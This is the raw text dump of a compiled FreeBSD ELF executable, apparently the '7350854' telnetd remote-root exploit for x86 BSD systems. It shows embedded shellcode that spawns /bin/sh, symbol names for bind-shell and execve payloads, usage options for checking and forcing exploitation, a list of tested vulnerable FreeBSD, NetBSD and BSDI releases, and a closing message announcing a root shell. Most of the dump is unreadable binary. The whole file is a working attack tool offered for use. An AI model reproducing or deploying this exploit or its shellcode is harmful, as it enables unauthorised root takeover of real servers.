ELF 454 (444111@p2/usr/libexec/ld-elf.so.1FreeBSD%/- .&#,*% +($'  !  )" 1,<!*L86\=lD|}J@QX_flФ  v̈0{܈h* p  H,{@<LC\lD lYܥ5 |L t@+4pA[F'K̉R܉X nlibc.so.4printfrandomconnect_DYNAMIC__inet_addrmemcpyperrorsleepoptargsocketselectfflushbzero__udivdi3send_initwriteenvironfprintf__deregister_frame_info__progname__errorreadmemcmp__sFgettimeofdaygetopttimegethostbyname_finisprintf__cmpdi2atexitsrandomgetsockopt_GLOBAL_OFFSET_TABLE_exitatoistrlenfcntl__register_frame_infoclose_edata__bss_start_endend@ H@DHLPTX\ ` d h lptx|!#$%)*+,. 58%<%@h%Dh%Hh%Lh%Ph %Th(%Xh0%\h8p%`h@`%dhHP%hhP@%lhX0%ph` %thh%xhp%|hx%h%h%h%h%h%h%h%hp%h`%hP%h@%h0%h %hU WVSҍu^|=h~)}t#E8t8/u H @8u츸t R&hDWVSP-U=u@v@С8ut h ;uÍvUUthPh uÐUUEPhhhhh`hh@hj<ÉUSEhhQE U}EPPh E PEPkˆUunE<k}u [E`Mσƒu3EMσƒuE`MσƒEMσƒtbEEPEPhhEP }+<[}u% U< 0EPjEPE}uU[^_ÉUE;E vE 1EM1M E 1EEE U)щMM1uUEEUÉUjPÐUEE}t} t} t }%t 1ÉUM } }DEE;E|*EU ЋUMʊ:u vEύvM 뷍v1ÉUjjE}tUÉUEEv}t E8u vU<1tO<1<.<0t] [-c] [-f] -n num number of populators, for testing purposes -c check exploitability only, do not exploit -f force mode, override check results WARNING: this is no easy exploit, we have to get things tightly aligned and send 16/34mb of traffic to the remote telnet daemon. it might not be able to take that, or it will take very long for it (> 1h). beware. tested: FreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE NetBSD 1.5 BSDI BSD/OS 4.1 7350854 - x86/bsd telnetd remote root by zip, lorian, smiler and scut. n:cffailed to connect aborting failed to connect the second time ############################################################################# ok baby, times are rough, we send %dmb traffic to the remote telnet daemon process, it will spill badly. but then, there is no other way, sorry... ## setting populators to populate heap address space ## number of setenvs (dots / network): %d ## number of walks (percentage / cpu): %Lu ## ## the percentage is more realistic than the dots ;) percent |-| ETA | %2.2f%% | %1.2f%% | %3.2f%% |. | %02lu:%02lu:%02lu || --:--:-- | ## sleeping for 10 seconds to let the process recover ## ok, you should now have a root shell ## as always, after hard times, there is a reward... command: ?@Bųxp:send%06xxp_setenv:send [Yes] &&xp_check:sendcheck: PASSED, using %dmb mode check: FAILED read userread remote................................ !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~................................................................................................................................./* %s, %u bytes */ %02x | %c | on steroids, huh? invalid bitwalker: bw = %d 0011.01110011.11111001.10001001.10011111.10001111.11001111.01010010.01110010.11110100.1r0100.0r1001.11111001.00001111.10011111.11011001.0rخ (2:BLV`jtoo much blacklisting, giving up... `0 {<1SCSCSaS̀RfhDDfSjUVVjhX̀j̀`̀SPPZ̀KyRhn/shh//bi`^^;̀j;XRhn/shh//bi`^^̀<1;Rhn/shh//biRSRQS"2BRbrˆ҈"2BRbr‰҉  D(p  4GCC: (GNU) c 2.95.3 20010315 (release) [FreeBSD]GCC: (GNU) c 2.95.3 20010315 (release) [FreeBSD]GCC: (GNU) c 2.95.3 20010315 (release) [FreeBSD]GCC: (GNU) c 2.95.3 20010315 (release) [FreeBSD]GCC: (GNU) c 2.95.3 20010315 (release) [FreeBSD]GCC: (GNU) c 2.95.3 20010315 (release) [FreeBSD]01.0101.0101.0101.0101.0101.01.symtab.strtab.shstrtab.interp.note.ABI-tag.hash.dynsym.dynstr.rel.bss.rel.plt.init.plt.text.fini.rodata.data.eh_frame.ctors.dtors.got.dynamic.sbss.bss.comment.note#1((X7 ?ppG P  Y _  d HjDD&p``& x1  ~  2$$2,,24422@@3@@30@3,l4x491 A(p   D `  $,4@@   ,- 9 O bԊ mPw܊   $   (<  0   ԣ 8 HR 1, )<1:`J LlZ XL8dd mb un {F T \l6  |}@Ф  ̈0L < l܈h* 'p+X2 9  > I PX ]4 c- fmȜ~ yH~d @ $ ( ,@<x LCD \lD lYܥ5 |L# ^ &@-4CpH[M'R̉Y܉_, b/ t 0 crtstuff.cgcc2_compiled.p.3__DTOR_LIST__completed.4__do_global_dtors_aux__EH_FRAME_BEGIN__fini_dummyobject.11frame_dummyinit_dummyforce_to_data__CTOR_LIST____do_global_ctors_aux__CTOR_END____DTOR_END____FRAME_END__7350854.cx86_nopbs34random_getprintfrandomx86_bsd_execveshconnect_DYNAMICx86_bsd_portshellnet_resolve__inet_addrxp_checkhexdumpusagex86_nop_xfershellmemcpyperrorbadshellcodesleepoptargsocketselectfflushbzero__udivdi3send_initxp_popforcewalkwriteenvironfprintf__deregister_frame_infoendx86_nop_rwregmode__progname_start__errorreadpop34xpmemcmpnet_connect__sFxp_setenvcheckonlynumpopgettimeofday__bss_startgetoptmaintimenet_conntimeoutgethostbyname_finisprintf__cmpdi2atexitrandom_initsrandomgetsockoptbadstr_edata_GLOBAL_OFFSET_TABLE__endexitatoistrlenfcntlbsx86_bsd_compaexec__register_frame_infoclosenum34